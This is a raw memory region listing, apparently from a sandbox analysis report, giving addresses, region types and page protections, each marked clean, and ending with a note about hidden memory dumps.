page read and write
 clean
CF0000
unkown image
page readonly
 clean
57B000
heap default
page read and write
 clean
21EF000
stack
page read and write
 clean
223E000
stack
page read and write | page guard
 clean
50000
unkown image
page readonly
 clean
4E0000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
5F4000
heap default
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
2D61000
unkown
page read and write
 clean
50D4000
unkown
page read and write
 clean
30FD000
unkown
page read and write
 clean
3064000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
1B5CD000
stack
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
12EA1000
unkown
page read and write
 clean
2F8B000
unkown
page read and write
 clean
30D4000
unkown
page read and write
 clean
710000
unkown image
page readonly
 clean
43B0000
unkown
page read and write
 clean
3A6A000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
1B960000
unkown
page read and write
 clean
1B91D000
unkown
page read and write
 clean
86D000
heap default
page read and write
 clean
36A8000
unkown
page read and write
 clean
820000
heap default
page read and write
 clean
186000
unkown
page execute and read and write
 clean
2270000
unkown image
page readonly
 clean
3AC0000
unkown
page read and write
 clean
55A4000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
12ED1000
unkown
page read and write
 clean
17D000
unkown
page execute and read and write
 clean
7FF00200000
unkown
page read and write
 clean
5D0000
heap default
page read and write
 clean
280000
heap private
page read and write
 clean
3649000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
2800000
unkown image
page readonly
 clean
18E000
stack
page read and write
 clean
2CA0000
unkown
page read and write
 clean
30C7000
unkown
page read and write
 clean
3AEA000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
B00000
unkown
page read and write
 clean
3419000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
3A4A000
unkown
page read and write
 clean
2AD7000
heap private
page read and write
 clean
3AC4000
unkown
page read and write
 clean
38B2000
unkown
page read and write
 clean
A60000
unkown
page execute and read and write
 clean
3A41000
unkown
page read and write
 clean
20000
unkown image
page read and write
 clean
52FE000
stack
page read and write
 clean
50000
unkown image
page readonly
 clean
AF0000
unkown
page read and write
 clean
B80000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
9790000
unkown
page read and write
 clean
7FF001D0000
unkown
page execute and read and write
 clean
520000
unkown
page read and write
 clean
400000
unkown image
page readonly
 clean
CF0000
unkown image
page readonly
 clean
2180000
unkown
page read and write
 clean
100000
unkown
page read and write
 clean
3AFC000
unkown
page read and write
 clean
525000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
36CB000
unkown
page read and write
 clean
28E0000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
A7B000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
196000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
CF2000
unkown image
page execute read
 clean
30CC000
unkown
page read and write
 clean
1BBE0000
heap private
page read and write
 clean
3ADF000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
2FE7000
unkown
page read and write
 clean
7EFE0000
unkown image
page readonly
 clean
334000
heap default
page read and write
 clean
3495000
unkown
page read and write
 clean
D6E000
unkown image
page readonly
 clean
23FE000
unkown
page read and write
 clean
3086000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
3077000
unkown
page read and write
 clean
2FD1000
unkown
page read and write
 clean
370C000
unkown
page read and write
 clean
2199000
unkown
page read and write
 clean
12D8C000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
4970000
unkown
page read and write
 clean
2A6000
unkown
page read and write
 clean
197000
unkown
page execute and read and write
 clean
4E5000
unkown
page read and write
 clean
13042000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
6840000
stack
page read and write
 clean
28C4000
unkown
page read and write
 clean
2CAA000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
800000
heap private
page read and write
 clean
16D000
unkown
page execute and read and write
 clean
7D0000
unkown image
page readonly
 clean
3ABC000
unkown
page read and write
 clean
540E000
stack
page read and write
 clean
297000
heap default
page read and write
 clean
4E7000
unkown
page read and write
 clean
4852000
heap private
page read and write
 clean
520000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
28A000
unkown
page execute and read and write
 clean
CAD000
stack
page read and write
 clean
2265000
stack
page read and write
 clean
3675000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
7FF00042000
unkown
page execute and read and write
 clean
520000
unkown
page read and write
 clean
164000
unkown
page read and write
 clean
2260000
stack
page read and write
 clean
3659000
unkown
page read and write
 clean
7FFFFFC0000
unkown image
page readonly
 clean
860000
heap default
page read and write
 clean
1B490000
unkown
page read and write
 clean
7FF00270000
unkown
page execute and read and write
 clean
224A000
stack
page read and write
 clean
1BF0000
unkown image
page readonly
 clean
4E0000
unkown
page read and write
 clean
55A0000
unkown
page read and write
 clean
308A000
unkown
page read and write
 clean
1F00000
heap private
page read and write
 clean
2850000
unkown
page read and write
 clean
7FFFFFC0000
unkown image
page readonly
 clean
2190000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
3A44000
unkown
page read and write
 clean
1C30000
unkown image
page readonly
 clean
2850000
unkown
page read and write
 clean
CF2000
unkown image
page execute read
 clean
7EFC0000
unkown image
page readonly
 clean
677F000
stack
page read and write
 clean
1E30000
heap private
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
21A6000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
4F10000
heap private
page read and write
 clean
21F0000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
A71000
unkown
page read and write
 clean
2FC0000
unkown
page read and write
 clean
697E000
stack
page read and write
 clean
4B5E000
stack
page read and write
 clean
30A7000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
192000
unkown
page read and write
 clean
3A54000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
4E5000
unkown
page read and write
 clean
675F000
stack
page read and write
 clean
21A0000
unkown
page read and write
 clean
7FF00032000
unkown
page execute and read and write
 clean
304A000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
3239000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
2CE000
heap default
page read and write
 clean
525000
unkown
page read and write
 clean
5280000
unkown
page read and write
 clean
E0000
unkown image
page read and write
 clean
655D000
stack
page read and write
 clean
100000
unkown
page read and write
 clean
374000
heap private
page read and write
 clean
1DA0000
heap private
page execute and read and write
 clean
4EB000
unkown
page read and write
 clean
55AE000
unkown
page read and write
 clean
3082000
unkown
page read and write
 clean
26F0000
unkown
page read and write
 clean
3646000
unkown
page read and write
 clean
7FF00240000
unkown
page execute and read and write
 clean
3B0000
heap private
page execute and read and write
 clean
4E5000
unkown
page read and write
 clean
AF0000
unkown
page read and write
 clean
160000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
3724000
unkown
page read and write
 clean
3007000
unkown image
page readonly
 clean
2D91000
unkown
page read and write
 clean
7EFDF000
unkown
page read and write
 clean
7FF00170000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
CF0000
unkown image
page readonly
 clean
4E5000
unkown
page read and write
 clean
4E5000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
1C7B0000
unkown
page read and write
 clean
520000
unkown
page read and write
 clean
2180000
unkown
page read and write
 clean
2A06000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
2D8F000
unkown
page read and write
 clean
7FF001E0000
unkown
page read and write
 clean
4AFE000
stack
page read and write
 clean
7FF00180000
unkown
page execute and read and write
 clean
2FE1000
unkown
page read and write
 clean
30000
unkown image
page readonly
 clean
1B10000
heap private
page read and write
 clean
F4000
unkown
page read and write
 clean
9290000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
7EFC2000
unkown image
page readonly
 clean
2D8F000
stack
page read and write
 clean
235000
unkown
page read and write | page guard
 clean
28C0000
unkown
page read and write
 clean
2850000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
40B000
heap default
page read and write
 clean
2250000
stack
page read and write
 clean
2A6000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
7FF00032000
unkown
page execute and read and write
 clean
7FF00280000
unkown
page read and write
 clean
BE000
heap default
page read and write
 clean
488D000
unkown
page read and write
 clean
20000
unkown
page read and write
 clean
30A4000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
305A000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
5D1E000
stack
page read and write
 clean
50CD000
unkown
page read and write
 clean
365F000
unkown
page read and write
 clean
571000
heap default
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
1B960000
unkown
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
25E6000
unkown
page read and write
 clean
525000
unkown
page read and write
 clean
B80000
unkown
page read and write
 clean
369B000
unkown
page read and write
 clean
526D000
stack
page read and write
 clean
1C980000
unkown
page read and write
 clean
AF0000
unkown
page read and write
 clean
2250000
stack
page read and write
 clean
D6E000
unkown image
page readonly
 clean
12D61000
unkown
page read and write
 clean
525000
unkown
page read and write
 clean
1BB80000
heap private
page read and write
 clean
60000
unkown image
page readonly
 clean
3A90000
unkown
page read and write
 clean
7FF0010A000
unkown
page execute and read and write
 clean
3709000
unkown
page read and write
 clean
2363000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
1BAFE000
stack
page read and write
 clean
27A0000
unkown image
page readonly
 clean
233D000
stack
page read and write
 clean
520000
unkown
page read and write
 clean
1BCFE000
stack
page read and write
 clean
2850000
unkown
page read and write
 clean
7FFFFFC2000
unkown image
page readonly
 clean
317000
heap default
page read and write
 clean
30A4000
unkown
page read and write
 clean
A70000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
7470000
heap private
page read and write
 clean
234B000
unkown
page read and write
 clean
3A3E000
unkown
page read and write
 clean
3AF4000
unkown
page read and write
 clean
54CE000
stack
page read and write
 clean
A70000
unkown
page read and write
 clean
2240000
stack
page read and write
 clean
AF0000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
AE0000
unkown
page read and write
 clean
489C000
stack
page read and write
 clean
CF2000
unkown image
page execute read
 clean
2AFA000
heap private
page execute and read and write
 clean
3A28000
unkown
page read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
3662000
unkown
page read and write
 clean
There are 1460 hidden memdumps, click here to show them.